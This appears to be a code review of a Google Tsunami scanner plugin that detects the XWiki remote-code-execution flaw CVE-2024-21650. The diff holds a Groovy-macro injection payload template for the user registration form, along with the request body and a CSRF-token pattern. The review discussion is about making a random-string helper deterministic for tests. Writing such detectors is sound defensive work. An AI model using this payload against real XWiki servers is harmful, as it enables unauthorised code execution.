community/detectors/xwiki_cve_2024_21650/src/main/java/com/google/tsunami/plugins/detectors/rce/cve202421650/Cve202421650Detector.java

```diff
@@ -0,0 +1,247 @@
+import com.google.tsunami.proto.VulnerabilityId;
+import java.io.IOException;
+import java.time.Clock;
+import java.time.Duration;
+import java.time.Instant;
+import java.util.Base64;
+import java.util.regex.Matcher;
+import java.util.regex.Pattern;
+import javax.inject.Inject;
+
+/** A {@link VulnDetector} that detects XWiki RCE CVE-2024-21650. */
+@PluginInfo(
+    type = PluginType.VULN_DETECTION,
+    name = "XWiki RCE CVE-2024-21650 Detector",
+    version = "0.1",
+    description = "This detector checks for XWiki RCE via user registration (CVE-2024-21650).",
+    author = "yuradoc (yuradoc.research@gmail.com)",
+    bootstrapModule = Cve202421650DetectorBootstrapModule.class)
+public final class Cve202421650Detector implements VulnDetector {
+  private static final GoogleLogger logger = GoogleLogger.forEnclosingClass();
+
+  private static final String REQUEST_PATH = "bin/register/XWiki/XWikiRegister";
+
+  private static final String PAYLOAD_PLACEHOLDER =
+      "]]{{/html}}{{async}}{{groovy}}{{CMD}}{{/groovy}}{{/async}}";
+
+  private static final Pattern CSRF_TOKEN_PATTERN =
+      Pattern.compile("form_token\" value=\"(.*?)\" />");
+
+  private static final String REQUEST_POST_DATA =
+      "parent=xwiki:Main.UserDirectory&register_first_name="
+          + "{{PAYLOAD_PLACEHOLDER}}"
+          + "&register_last_name=&xwikiname="
+          + "{{USERNAME}}"
+          + "&register_password="
+          + "{{PASSWORD}}"
+          + "&register2_password="
+          + "{{PASSWORD}}"
+          + "&register_email="
+          + "&form_token={{TOKEN}}";
+
+  private static final String REQUEST_CLEANUP_FIRST_NAME_REPLACEMENT = "Delete Me!";
+
+  private final Clock utcClock;
+  private final HttpClient httpClient;
+  private final PayloadGenerator payloadGenerator;
+  private final int oobSleepDuration;
+
+  @Inject
+  Cve202421650Detector(
+      @UtcClock Clock utcClock,
+      HttpClient httpClient,
+      PayloadGenerator payloadGenerator,
+      @OobSleepDuration int oobSleepDuration) {
+    this.utcClock = checkNotNull(utcClock);
+    this.httpClient = checkNotNull(httpClient);
+    this.payloadGenerator = checkNotNull(payloadGenerator);
+    this.oobSleepDuration = oobSleepDuration;
+  }
+
+  @Override
+  public DetectionReportList detect(
+      TargetInfo targetInfo, ImmutableList<NetworkService> matchedServices) {
+    logger.atInfo().log("Cve202421650Detector starts detecting.");
+
+    return DetectionReportList.newBuilder()
+        .addAllDetectionReports(
+            matchedServices.stream()
+                .filter(NetworkServiceUtils::isWebService)
+                .filter(this::isServiceVulnerable)
+                .map(networkService -> buildDetectionReport(targetInfo, networkService))
+                .collect(toImmutableList()))
+        .build();
+  }
+
+  @VisibleForTesting
+  String buildRandomString() {
+    return Long.toHexString(Double.doubleToLongBits(Math.random()));
```

Comment:
If you change this to:
```suggestion
    Random rand = new Random(this.utcClock.instant().toEpochMilli());
    return Long.toHexString(rand.nextLong());
```
you can avoid using `mock()` and `spy()` in the tests, as with the injected fake UTC clock this function would produce always the same value. It may also produce the same value in subsequent calls, but we probably don't really care.

Moreover, since this function is only used to get a pseudo-random username and password (to ensure that an account with that username doesn't exist I guess?), you could just use the millisecond time, with the same effect of not needing the extra imports in the tests:
```suggestion
    return Long.toHexString(this.utcClock.instant().toEpochMilli());
```

Reply:
oh really, done.